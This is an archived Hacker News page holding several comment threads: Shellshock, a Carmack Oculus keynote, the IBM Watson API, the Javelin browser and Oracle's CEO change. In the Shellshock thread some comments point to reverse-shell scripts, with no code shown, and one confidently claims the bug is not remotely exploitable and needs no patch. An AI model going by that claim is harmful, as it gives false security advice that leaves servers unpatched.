Honest question: does this mean this vulnerability has been in bash for essentially its entire history and someone only discovered it now?

Seems quite likely that someone would have discovered it sooner, especially since it's so simple to exploit.

zaroth 19 hours ago 2 replies      
Shellshock is a perfect name coming after Heartbleed. But this bug is suffering from lack of marketing, lagging in the news behind the iOS update being pulled.

It's sad to see an RCE somewhere so widespread and so interwoven with other software. It's also costly because now I'm questioning server integrity, thinking about what should really be re-imaged. I assume there are many more like this in the CVE pipeline...

At some point I just have to live with the fact that outside access is possible to anyone so motivated.

dustingetz 21 hours ago 3 replies      
I have a macbookpro which is my developer workstation. It is in a default configuration, it is on 12 hours a day, always behind a NAT. What do I need to do to protect myself?
blocke 20 hours ago 0 replies      
Rogue DHCP servers should not be a problem in any decently engineered enterprise or college campus network. Cisco switches have included DHCP snooping for years which when used only allows authorized switch ports to act as a DHCP server. Any decent enterprise wireless platform should either have transparent firewall functionality to block client DHCP responses or an equivalent to DHCP snooping.

If you've properly deployed these tools you've greatly limited the potential impact of a DHCP based worm.

Home router? Anyone test this against Linksys junk yet?

hamstergene 9 hours ago 1 reply      
I'm really surprised how many people out there write CGI in Bash. That's one of the things which would have never crossed my mind.
Animats 20 hours ago 0 replies      
What about simply disabling CGI in Apache? If you're not using it, turn it off. Use "--disable-cgi" at Apache launch. This will break some "control panels", but you probably shouldn't be using a CGI-based control panel in 2014 anyway.
TheSoftwareGuy 22 hours ago 2 replies      
I didn't realize iOS and OS X DHCP could be vulnerable. This just went from "Man a lot of other people should be worried about this" to "shit, shit, shit, shit, shit", since I don't run a web server.
tdicola 22 hours ago 3 replies      
As someone who just runs an Ubuntu 14.04 desktop machine without any web server should I be concerned? I don't really see how anyone could remotely execute bash on my system.
urs2102 9 hours ago 0 replies      
What you can do:


If you need a temporary fix until there is a new update - this can prove to be quite useful.

ccvannorman 7 hours ago 1 reply      
Sorry in advance for noobing up this thread, but can you clarify this? As a Mac OS X user who connects to public wifi often, I'm still in the dark about whether I should literally turn off my wifi for now.. or am I safe?
grimtrigger 22 hours ago 1 reply      
Could anyone provide a simplified explanation for what this is and what it means?
milankragujevic 9 hours ago 1 reply      
Smart little tool to check if your website is vulnerable http://milankragujevic.com/projects/shellshock/ It can also do a deep check that checks many known URLs, not only the home page.
daviddede 9 hours ago 0 replies      
It absolutely is. Especially now with thousands of cPanel servers known to be vulnerable:


aus_ 21 hours ago 0 replies      
Shellshock is also "reverse-shell-able". This Python script relies on /dev/tcp which is not available by default on some distros. (Source: @ortegaalfredo) But you could probably rework it to use netcat.


deanclatworthy 19 hours ago 1 reply      
Can anyone outline some clear steps for those of us on Debian Squeeze who have not yet got a patch?
btown 22 hours ago 1 reply      
From one of the comments:

> The question isn't whether a CGI is written in bash, but if it calls out to bash no matter how indirectly. Lots of things use the system() libc function, so if /bin/sh is bash it's game over.

Is this true? Which systems are vulnerable to this by default?

pdkl95 21 hours ago 0 replies      
This is probably just a local problem in what I will euphemistically describe as my "very highly customized" shell, but... it might be useful to use "/usr/bin/env" instead of just plain "env" in that one-liner test for the vulnerability.

(or maybe the "command" builtin instead? It seems to also 'properly' show the vulnerability as well, but I'm not sure if that would affect the test in some cases)

schniggie 17 hours ago 1 reply      
CVE-2014-6271 cgi-bin reverse netcat shell


walterbell 21 hours ago 3 replies      
What are the best OS-specific alternatives to bash, which could be linked to /bin/sh until bash fixes are stable?
ck2 21 hours ago 0 replies      
Patched all the CentOS machines hours ago, whew.

It's on yum now, just yum update

krunkosaurus 6 hours ago 1 reply      
Isn't this all just armchair prophesying? Let's see some screenshots of actual exploits from anyone. It's hard to gain access to someone's shell unless it's 1990 and a server is using CGI-BIN. People are retweeting that this is "WORSE THAN HEARTBLEED!!!!111!" but Heartbleed literally left practically every server susceptible. I ran sample exploit code against a number of test hosts and saw mysql queries and passwords streaming in plain text. Yeah, shellshock is a big deal but I've yet to see the ground rumble and shake and Y2K x 10000 happen. This seems like a big deal but it actually isn't. Most likely no one can access your shell. Patch and move on.
f00ber 17 hours ago 4 replies      
Oh stop this stupidity already. If you are not running a Web server that spawns bash when serving an HTTP request, then you are NOT vulnerable.

Are you running a Web server that uses CGI scripts written in shell, or in plain C that uses the system() call? If you do, you have had other problems long before.

There are some grumblings about DHCP _client_ setups on Linux passing parameters via environment variables to shell scripts executed by bash, but I am yet to see this. This would be a problem, but probably easily fixable.

No need to panic or even patch anything (as always). If you're running servers on your machine and allow inbound connections you should know exactly what those servers are and what they execute on behalf of external users.

This is NOT remotely exploitable.

It's an ad campaign for "security researchers" people.

Keynote by John Carmack at Oculus Connect 2014 [video]
288 points by ivank  5 days ago   48 comments top 16
iamshs 4 days ago 2 replies      
I am only 10 minutes into this talk, but John is one awesome speaker. No PR talk at all, he is speaking his mind freely and in fact started with shortcomings of the product. The segue between different sections is so smooth. I do not have background in VR, but he explains things so smoothly. He is just freely talking about supply chain, and what the product constitutes. And he has been standing in the same spot. What a genuine speaker. Also, looks like Facebook's influence has been minimal. There is just no iota of bullshit in him. I like him already. My first John Carmack video, and I am already hooked. Now onto watching the full video.
Laremere 4 days ago 1 reply      
I love it when John Carmack talks, because he doesn't do marketing speak, and he doesn't dumb down his content. It's just a brain dump of technical info until they (almost literally) kick him off the stage.
gnarbarian 5 days ago 0 replies      
Carmack has been a hero of mine since the mid 90s. He was also the inspiration for me to go into computer science. Always a pleasure to listen to such a technically dense talk on the cutting edge of a subject dear to me. I highly recommend his quake-con keynotes as well for those of you who like this video.
webwielder 5 days ago 3 replies      
Perhaps even more impressive than Carmack's technical chops is his ability to stand in a single spot for hours on end.
jayavanth 4 days ago 1 reply      
Michael Abrash's keynote is worth checking out! https://www.youtube.com/watch?v=KS4yEyt5Qes
justifier 4 days ago 3 replies      
it becomes its own form of marketing speech,carmack was the reason i got involved: financially, temporally, and mentally; and i think the organisation understands this as common for a number of people.. especially 'developers'

the oculus is digital stereoscopy

which is hard with simple stationary fixed objects(i),but combine it with inferred spherical screen encapsulation and it becomes a real challenge, probably a fun one too

you let carmack wax poetic on his interesting ideas to fix this tech and he will talk about latency and hertz and i'll listen with bated breath because i like hearing people talk about solutions to problems

but then i put the headset on and i realise these are hardly the problems befallen the proposed goal

i want someone to address that piece of a person that is lost when they put the headset on for the first time,it almost appears physical when you see it waft out of them

i lost it, my gamer friend who already preemptively developed a defensive cynicism to the tech lost it, the eleven year old i introduce hacking to lost it,and that last one was probably the most significant for me to see

i had been using the object sitting on top of my bookshelf as an incentivising mechanism:'finish your project and i'll let you use the oculus'; last week he pushed his finished project but i had other obligations the following week so he had to wait 'two! whole! weeks!' to get to use the oculus

when i picked him up the following week, uncharacteristically early this time.. we both are lax in our punctuality but he refused to let me be late today so he came directly to me fifteen minutes early.. he went on and on about how he has been 'scared' all day:'scared, but like happy scared'; i tried to explain to him the concept of anxiety but his mind was hurling itself around all of what he was about to become witness to

i put the headset on him and he had fun with it, but when he took it off he became suddenly very pragmatic in his demeanor,he told me he thinks it hurt him,his head, his eyes, something.. he needed a glass of water,i explained that that was because instead of being a virtual reality in which he was transposed to the thing exploits an optical illusion which means your brain is doing a lot more work than it usually does trying to rectify the inconsistencies,if you've ever been frustrated by trying to see a sailboat in a magic eye you know what it feels like to use the oculus

i asked him his opinion:'honestly? ..well, unfortunately a little disappointed';

i see my position as creating a safe environment for him to develop his ideas so naturally i challenged him to explain himself by defending the technological feat that he was holding in his hand,but the only thing we could talk about quickly became anything other than what we wanted to talk about

so we talked about the tech,i started going all carmack on him and we had fun talking tech but the conversation was clearly avoiding talking about the 'experience' one develops when wearing the headset

i wanted to know what he lost, and asked him to describe the thing he thought it was going to be,he was unable:'i don't know, just different, like? more 3d`ish'; in fashion i told him to explain himself explicitly stead superficially:'but what does that mean? what did you think it was going to be? describe that to me';

'i don't know anymore'

this i understood, but my experience was different,after wearing the headset i started to dream up better ways to do what i thought they were trying to do before i put it on,ways to do what i wanted from virtual reality,they are dreams and some built on the sort of technological feats of dreams but this was and still is my reaction each time i wear it

so yes john, tell me all about your brilliant ideas for fixing latency issues because this stuff is fun,but please acknowledge the baseline of this research is fundamentally flawed as it pertains to the proposed goals

i've stopped calling the oculus virtual reality,the oculus is digital stereoscopy




.(i) the first thing i did with the oculus was pull up two terminals, cat out some of my writing,align vertically,then slowly move one terminal into the field of view of the other eye until the text seemed to stop wonking my brain and really pop out at me

the experience was profound

so, i threw together a little browser playground with two 117px squares,one blue and one pink,i aligned them vertically then again slowly moved one into the field of view of the other eye,and i waited until those two distinct colors overlaid in my mind as a single purple

herein lies the problem:there was a multi pixel range where my brain would close the gap manually, out of my control and rather forcibly;it was impossible for me to find the perfect distance between the two divs,340pxs worked but so did plus or minus 4px from 344px,the perfect'exact`preferred`innate distance was undiscoverable because of the exception handling in my brain's interpretation of my visual input

.. edit:: gramm`err

asadlionpk 4 days ago 0 replies      
Just finished watching, I am impressed at how low-level/technical he can get without boring or confusing the audience.

I have some experience with technical speaking and it's very hard to make a technical point without dumbing it down for the audience.

lucasgw 4 days ago 2 replies      
I was in the room - he is a truly dynamic speaker and obviously a super-intelligent guy. I think he went off the rails a bit with the suggestion of interlacing as a potential solution. That makes little sense to me. It's, at best, a short-term solution once you get fast enough displays and rendering. (And as an old-time video guy... just... god, please... no...)
asciimo 4 days ago 1 reply      
While listening to all of the mitigation strategies that Carmack proposed for the technological challenges, I wondered if you could hack the user. What about drugs? Is there something that can reduce our sensitivity to low-frequency displays and yaw lag? At the very least, motion sickness drugs?
riffraff 4 days ago 1 reply      
Sorry for the somewhat lame question, but is he always that still?

I'm 10 minutes in and I don't think he moved his feet once, and his right hand just a couple times.

It feels very weird for me to watch and I just noticed it now, is there something wrong with me?

Jacky800 3 days ago 0 replies      
John Carmack is a great technical speaker. His interesting thoughts flow in a continuous stream and as a listener it's almost impossible to get distracted.

I wish Carmack would do an interview in the "Coders at Work" format where we can get some insight on

How he approaches debugging,

what tools he uses apart from visual studio.

How does he approach an already existing large code base?

What is the optimal duration to code without interruption.

What techniques does he use to get in to flow state e.t.c..

walterbell 4 days ago 0 replies      
Nice use of keynote to directly present requirements to engineers throughout the display supply chain, especially in large companies like Samsung.
vertis 4 days ago 0 replies      
This keynote was by far the highlight of the entire conference for me

Second were the amazing demos on the Crescent Bay prototype

Kenji 4 days ago 0 replies      
Nothing Carmack does is ever boring. This man is a huge inspiration for me.
Vanayad 4 days ago 1 reply      
Can anyone tl;dr the new stuff in this version of the oculus prototype ?
bsaul 4 days ago 1 reply      
Anyone's got a link to the slidedeck ?
IBM Watson API
298 points by miket  1 day ago   84 comments top 13
pesenti 1 day ago 13 replies      
IBM is about to make these APIs (and many others) much more accessible as part of BlueMix (https://ace.ng.bluemix.net/ - the IBM PaaS/Heroku). I lead the team in charge of developing the Watson platform. Ask me questions!
mooreds 1 day ago 1 reply      
If you want access to the API, you have to fill out a form, here: http://www.ibm.com/smarterplanet/us/en/ibmwatson/form_ecosys...

This is buried in the docs as a comment on this page: https://developer.ibm.com/watson/docs/developing-watson-apis...


No real support for 'playing around' with the API. Bummer.


Just went through the application process linked above. Be prepared to give info about yourself and your company and an explanation of why you want access to the Watson API, as well as what type of information you'll be working with. I stated 'just want to play around with the API'. We'll see how they react to that.

readerrrr 1 day ago 4 replies      
Out of curiosity I googled the same request.


I think this might be useful if Watson was being fed with a medical database. Otherwise I don't see any need for it; is there any?

edit: Watson as a legal consultant would be great. There might be a product in that, not as a replacement for a lawyer but more as a guide/search tool.

malanj 1 day ago 4 replies      
Has anyone at HN used either IBM Watson or Wolfram Alpha to build a real (commercial) app? It feels like there should be a whole wave of apps built on either of these technologies but it doesn't seem to be materialising.

What is holding back the killer apps for answer/computation engines?

mark_l_watson 1 day ago 0 replies      
I am helping a customer integrate Watson into their system so I am very happy to see the news about BlueMix (https://ace.ng.bluemix.net/) that apparently will allow me to keep experimenting with Watson after my consulting engagement is complete.

If you read the documentation, you will see that preparing training data and questions is fairly straightforward.

beebs93 1 day ago 0 replies      
I sent an e-mail to my co-workers containing "...natural English to ask Watson..." and somehow people read it as "You can ask Emma Watson, who is English, a question and she will respond".

And I thought, "...close enough - Watson could answer questions about Emma".

mooreds 1 day ago 0 replies      
I found the link above to be a bit useless as it jumps right into getting answers with evidence. Here's a better overview link: https://developer.ibm.com/watson/docs/developing-watson-apis...
Tyrant505 1 day ago 0 replies      
Does this also give access to their cooking and recipe data?

Edit: http://www.ibm.com/smarterplanet/us/en/cognitivecooking/

yatoomy 1 day ago 0 replies      
I've been looking into Watson's new application to analytics etc. How would that compare to say Mathematica or the Wolfram Language/Data Science Platform?
kyberias 1 day ago 0 replies      
Looking at that example, I wonder why that Porcaro quote is listed as evidence. It doesn't relate to Jackson's album at all.
ilaksh 1 day ago 1 reply      
So you just ask it any random question and it knows everything? Or only things that come up on Jeopardy?

I don't see an API for feeding it information.

Doublon 1 day ago 0 replies      
"Questions" in the documentation without question mark (?) seem somehow wrong to me.
80ProofPudding 1 day ago 0 replies      
Waiting for my coffee to brew, I read that as "Emma Watson API".
Show HN: Javelin Browser
276 points by nubela  9 hours ago   93 comments top 31
TheCraiggers 8 hours ago 2 replies      
I've been using your browser for a couple months now (I think I saw it mentioned on Android Police if you're curious) and I've been liking it. It looks slick, and works exactly how I think it should. The one problem I have with it is one I'd like other opinions on, both for my curiosity and your benefit.

Frankly, it's not my daily driver because I don't know who you are and don't trust you. Using a (no offense) no-name browser is somewhat of a risk as the developer could potentially be recording personal info. Of course, I have no guarantee that Mozilla isn't either. However, and yes I'm fully aware of how silly this sounds, I trust Mozilla despite never looking at their code or knowing any of the developers.

I'm guessing privacy is important to you (since you have the option of using a VPN service as IAP) so I'm curious how you would allay my fears of using a random browser from someone other than the big three.

Either way, I wish you luck.

roryokane 4 hours ago 0 replies      
Bug reports for the developer nubela:

Swipe from the left to open the menu, then scroll down, so that part of the text is cut off, then swipe to the left to close the menu part of the way, but drag your finger back right before the menu closes. If you now scroll, the cut-off text is still visible, creating weird visual artifacts. This goes away when you close the menu completely and reopen it.

When I edit the title and URL of a bookmark, the buttons are Cancel and Edit. I think Save would work better. I feel like what I am doing is already editing, since I chose Edit to get here.

I tried to set Javelin as the default browser, but when the browser list popped up, by reflex I hit Just Once instead of Always. But Javelin still said Javelin is now your default browser. (Then I realized what had happened and went back and did it again.) If possible, Javelin should detect when the user clicked the wrong button. If that is not possible, maybe you should show a small picture of the Always button before showing the dialog, to remind the user to hit that button.

In the page describing the Pro features, one of them is choosing your homepage. But I can already do that in the free version. It works when I go to Settings > Change homepage.

Javelin doesn't support a blank homepage. I tried setting the homepage to nothing ("") or to about:blank, but either way, the homepage just becomes "Webpage not available". The error shows because Javelin is automatically adding an http:// before about:blank; about: pages should have no protocol.

I tried to press and hold on the icons (the eye icon and share icon) in the toolbar to see a tooltip describing what they do. However, those icons don't have tooltips. I would have liked to have been able to see a "Reading Mode" tooltip when I pressed and held on the eye icon instead of having to actually press it to find out. The icons in the toolbar for reading mode have the same problem.

When there are no tabs, I see a message "Javelin Browser, flies." The message confused me a bit because it is ungrammatical. It should be either "Javelin Browser flies." or "Javelin Browser: it flies."

I couldn't get Javelin Sync to work at all. I authorized it for my Google account and saw the message saying I have been sent an email. But my bookmarks are still the default Javelin ones (minus the ones I manually deleted); none of them are my Chrome for Android bookmarks. This is still the case even after I "Sync bookmarks now", though since that command gives no feedback, I couldn't tell whether it worked. (I didn't install the desktop Chrome extension linked in the email because I don't want that home page, but the email said my device was already synced, so that shouldn't make a difference.) So either your Sync is broken or there is another step that you forgot to mention, like "wait one hour" or "restart your phone" or something.

In the menu on the left, the checkboxes look a little weird, because it is a blue checkmark on a turquoise background. I can see it, but I think they would look better if you made the check-marks very light gray, a color closer to the text but still distinct from it.

When I logged into a site, I got two dialog boxes asking me to save the password. The first was a generic Android one like in Google Chrome. I clicked Not Now, and then Javelin showed its colorful one at the bottom. You should hide the default one so that only the Javelin one shows.

I couldn't figure out how to activate the "Fullscreen Browsing" that you show in one of your website's screenshots. I tried scrolling through web pages, and I looked at all the settings, but I never had the Action Bar and the soft buttons displaying but transparent like in the screenshot. The soft buttons are always visible. I can hide the Action Bar completely with that setting, but then I can't open it at all from within the app, and that's different from the screenshot anyway. It's not described as a Pro feature on the "Enable Javelin Pro" page either. You should make it more obvious how to enable that mode, or remove the screenshot if that feature is now gone.

This is a big list of bugs, many tiny ones and some big ones, but I'm still trying out Javelin for now; you haven't driven me back to Chrome yet. I am especially interested in your Adblock and full-screen features (so it's too bad I can't figure out how to use full-screen). I wish you luck with developing your browser.

nubela 8 hours ago 1 reply      
Developer here!

I've been working on Javelin since Feb this year and this is the 4th iteration, and on Reddit (r/android), and just a quick interesting byte. Javelin actually started as a "porn" browser! See: http://www.reddit.com/r/Android/comments/1xblv9/hey_reddit_s...

PS: I'm headed to SF in October, anyone wanna grab a beer/coffee? I'm contactable at hello@javelinbrowser.com

ClifReeder 6 hours ago 2 replies      
I notice that you use www.theverge.com in a number of the screenshots for Javelin. The writers at The Verge, the developers that build the site, the designers that make it beautiful - are all paid through ad revenue. Please consider at least adding the ability to whitelist sites if you are going to bundle ad block.

*Full disclosure - I am a developer at Vox Media, the publisher of The Verge.

robotfelix 5 hours ago 0 replies      
To me, including "mobile-first" as one of your key value propositions seems a little odd.

My immediate reaction was to wonder whether any mobile browsers aren't mobile-first? From my (incomplete) knowledge of smartphone browsers they all feature interfaces designed for smartphones and smartphones alone.

There must be a better word to use in your tagline - I notice you decided on using "Truly Mobile" further down ;)

this_user 8 hours ago 0 replies      
Why would I want to use a browser made by a group that is seemingly mostly preoccupied with design, judging from your website? You don't even disclose who is really behind this project. Browser security especially is more important than ever. When using one made by Google or Mozilla I can be sure that they do take security seriously, and have the necessary experience, technical know-how and manpower to deal with vulnerabilities in a timely manner.
phpnode 8 hours ago 1 reply      
I think you're making a mistake by offering this for free.

The kind of people who care enough about their web experience to install a new browser are the kind of people who won't mind parting with a few $ to do so.

To be profitable, free apps must target the broader market, but this is a relatively niche product. I don't think you'll get enough IAP fast enough to be sustainable.

l33tbro 4 hours ago 0 replies      
Awesome browser. But why use "gorgeous" as a descriptor? It's become such a meaningless term in tech, even when Jobs was still peddling it about.

It seems trivial, but seeing that word often is a red flag for an uninspired product. You guys have done great work, so I'm surprised your marketing isn't as great as the browser. Best of luck

tambourine_man 36 minutes ago 0 replies      
Ironically, I get a blank page on my iPhone
shock 7 hours ago 1 reply      
It looks very good. It's a pity it only syncs with Chrome and not with Firefox.
instakill 7 hours ago 2 replies      
Ha! Reddit definitely doesn't look that great on mobile.
blntechie 8 hours ago 2 replies      
I used it for about 3-4 months when 'Stack' was introduced but went back to Link Bubble + Chrome. I couldn't exactly remember why I went back to LB + Chrome, but mostly due to 'Stack' being too rigid for my liking compared to Link Bubble (back button not closing the stack, no easy jumping between stacks, scrolling and stack animations kind of wonky, etc.)

All things said, I loved the browser experience. Especially easy access to bookmarks on right edge swipe and always available refresh button. I will definitely try it again. Speed dial looks good.

Edit: Just installed again and wow!! It totally looks different from the version I used some time back. Looks more slick and pretty now. Will definitely try again. Especially the 'Stack' behavior.

ezequiel-garzon 6 hours ago 1 reply      
You had me at "reading mode". I can't believe text wrap, pervasive in smart- and not-so-smart-phones of yore, is today considered a rarity. Thankfully I'm not alone [1].

[1] https://code.google.com/p/android/issues/detail?id=62378

jonalmeida 7 hours ago 0 replies      
Just out of curiosity, what are you using to parse the reading view of a webpage? It seems really fast so I doubt you're using Readability; probably some local library?
fdsary 6 hours ago 0 replies      
Wow, this makes me want to ditch my iPhone...
microsby0 6 hours ago 0 replies      
Any thoughts of an iOS version as well? This really makes me jealous of Android users
zanethomas 8 hours ago 2 replies      
I'm interested but don't want to use the "play" store. Can you provide some other download link?
joshvm 6 hours ago 0 replies      
My only criticism is that the icon is practically a mirror image of Telegram, but that's not exactly your fault.

Is there a way to save pages for offline viewing?

Miraries 8 hours ago 1 reply      
Any particular reason it's not compatible with OnePlus One and Nexus 10 on Google Play? I get it if tablets aren't supported. I could get the apk but I was wondering... If testing is the reason, I can help.
grumblestumble 7 hours ago 1 reply      
Very minor nitpick: Your usage of "thought out" comes across as stilted and unprofessional. I'm guessing English isn't your native language?
shreeshga 6 hours ago 0 replies      
Just curious, which browser engine does it use?
cmdrfred 7 hours ago 1 reply      
Looks good. Adblock integration is a nice touch, that's pretty much my first line of defence when it comes to anti-malware on the systems I administrate.
spihn3 5 hours ago 0 replies      
Adblock and readability feature integration is great! As a developer, could I ask you how you are implementing the readability feature? Is this done client side?
Kiro 8 hours ago 1 reply      
What rendering engine are you using?
thrush 8 hours ago 1 reply      
Slightly unrelated question, but is there an equivalent for iOS app extensions on Android?
ahstilde 8 hours ago 1 reply      
I like it a lot! Any way you could have it sync with Firefox?
anishkothari 8 hours ago 0 replies      
Looks great! I'm going to try this out
ultim8k 7 hours ago 0 replies      
Kudos man! It really looks beautiful.
jessedhillon 7 hours ago 2 replies      
I like it a lot. But I have a tangential question: has anyone found a good writeup on rise of the use of adjectives like gorgeous, stunning, beautiful, amazing to describe apps? Aside from my personal opinion, I'd like to know if anyone else has observed and written about this trend.
N0RMAN 8 hours ago 1 reply      
Why do you offer it for free?
robinhoodexe 8 hours ago 0 replies      
Looks pretty slick!
Larry Ellison Will Step Down as CEO of Oracle, Will Remain as CTO
271 points by jhonovich  7 days ago   89 comments top 13
chollida1 7 days ago 5 replies      
Interesting that they name Co-CEOs in Catz and Hurd. I wonder how that will work, especially given Hurd's "tough to work with" reputation.

Interestingly Ellison will be the CTO. This could be a shit show with 3 people trying to run the show!

I mean does anyone really expect Larry Ellison to start taking marching orders. Will be interesting to watch the short interest on this company!

I think the two-headed CEO is what the street expected all along, as Catz has been around forever and a lot of people thought that Hurd, the former HP CEO, was promised the CEO title when Ellison resigned.

It looks like they, Catz and Hurd, will split the running of day to day operations as Hurd gets sales, marketing and strategy reporting to him, while Catz will continue to have finance, legal and manufacturing.

It's down about a dollar after the close on about a third higher trading volume than normal. So it doesn't look like anyone is "spooked" by the news.

dm8 7 days ago 1 reply      
If you want to read about Larry Ellison's personality and his management style, you should read - "The Difference Between God and Larry Ellison: Inside Oracle Corporation; God Doesn't Think He's Larry Ellison". (http://www.goodreads.com/book/show/181369.The_Difference_Bet...)

It's one of the best books written on him and the way he managed Oracle right from its beginnings. He was damn good at selling things.

mindcrime 7 days ago 1 reply      
Not really sure what to say about this. I don't know Ellison, nor do I own Oracle stock, or have any particular interest in Oracle per-se. But nonetheless, I've always seen Ellison as an important character in our industry, and after reading a biography about him, I felt a sort of kinship with him based on some shared interests.

At any rate, it definitely feels like the "end of an era" in a sense. I got my start in this industry in the mid to late 90's when Oracle, IBM, Novell, Microsoft, Borland, etc. were duking it out for supremacy, and - for better or worse - you've never really been able to escape Oracle's shadow to some extent. And Ellison was Oracle, in so many ways.

Edit: It's been a while, but I think this[1] was the biography I read. I'll just say this: regardless of what you think of Ellison, he's an interesting character and reading about the history of Ellison / Oracle is quite fascinating.

[1]: http://www.amazon.com/Softwar-Intimate-Portrait-Ellison-Orac...

smacktoward 7 days ago 0 replies      
I'm guessing he wants to spend more time wringing extortionate license fees out of his family?
ChuckMcM 7 days ago 1 reply      
Demonstrating once again that tech companies really don't "get" succession planning :-) I'm kind of half joking, if you look at a bunch of 'old school' BigCorps, the progression is (CEO->Chairman, SVPx -> CEO, VPx -> SVPx) and then the Chairman of the board retires and the CEO takes on both roles Chairman and CEO, priming the pump for the next cycle.

Co-CEOs have so far been an experiment in disaster; something about not having an ultimate authority seems to really crimp organizations. I wish Oracle well but they have a lot of challenges to overcome. If I were a shareholder I wouldn't be all that pleased with this arrangement, as it seems to basically leave all the same people in place with all the same problems (Amazon/Google EC2/GCE, MySQL vs NoSQL vs expensive Oracle, Cheap Clusters with High Reliability vs Expensive Servers, etc.)

bsimpson 7 days ago 0 replies      
Someone in The Verge's comment section noted that this Forbes list will now need to be updated:
spindritf 7 days ago 1 reply      
The final Larry Ellison scorecard: Oracle stock is up 89,640% since he took the company public in March 1986.
turar 7 days ago 9 replies      
Co-CEOs? I only know one company that had co-CEOs, and that didn't work out well for them.
joelrunyon 7 days ago 4 replies      
Are there any more details into why he's doing this?
azifali 7 days ago 0 replies      
The end of an era for Oracle that existed as a software (licensing) company. I think that Ellison stepping in as the CTO is probably more important than him stepping down as the CEO.

This move will perhaps lay the groundwork for the next tens of billions in revenue for Oracle, in cloud-based software and infrastructure.

sebst 7 days ago 1 reply      
Will Oracle then become better? Maybe as good as Sun used to be?

just dreamin'...

justinph 7 days ago 3 replies      
What is with the capitalization on the headline on Recode? I read it and thought, who is "Will Remain"?

It should be: Larry Ellison will step down as CEO of Oracle, will remain as CTO

Headline capitalization is pretty easy: Capitalize the first word, then any proper nouns. That's it.

       cached 26 September 2014 02:11:01 GMT